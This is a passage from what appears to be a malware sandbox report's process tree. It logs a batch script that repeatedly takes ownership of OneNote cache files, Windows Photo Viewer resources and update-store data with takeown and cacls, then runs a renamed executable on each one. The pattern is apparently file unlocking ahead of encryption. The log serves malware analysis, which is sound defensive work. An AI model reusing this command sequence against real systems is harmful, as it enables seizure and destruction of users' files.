                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "0000009F.bin" -nobanner
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:8376
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:7416
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:4980
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:5372
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:7992
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "000000AL.bin" -nobanner
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:2360
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "000000AL.bin" -nobanner
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:3068
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4312
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:5632
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                          cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:6096
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                            PID:8328
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "000000B1.bin" -nobanner
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:8288
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "000000B1.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:1548
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:5112
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:5728
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                      PID:5956
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                      PID:5724
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                        PID:3752
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:5872
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:5468
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                          cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4396
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:6136
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:780
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2052
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:7560
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5592
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5296
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                      PID:5700
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "manifest.json" -nobanner
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5644
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "manifest.json" -nobanner
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:8200
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5616
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2488
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8212
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8456
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                    PID:5344
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7068
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8292
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                      cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:8548
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                        takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8684
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula "PhotoViewer.dll.mui" -nobanner
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9212
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:9180
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:8876
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6028
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                  PID:8888
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "store.db" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:8660
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "store.db" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8676
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8400
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin""
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                      PID:5464
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5320
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin"
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                          PID:1336
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000006.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8760
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "00000006.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                              PID:8716
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:8712
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin""
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:8792
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8832
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin"
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6336
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000J.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8912
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula "0000000J.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:9160
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                      lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:9152
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin""
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8816
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                          cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:9016
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                            takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin"
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                            PID:9116
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000U.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:9124
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000000U.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9036
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6196
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin""
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9132
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7088
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000018.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula "00000018.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6396
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8280
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9164
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6428
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6852
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000052.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6868
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "00000052.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6420
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
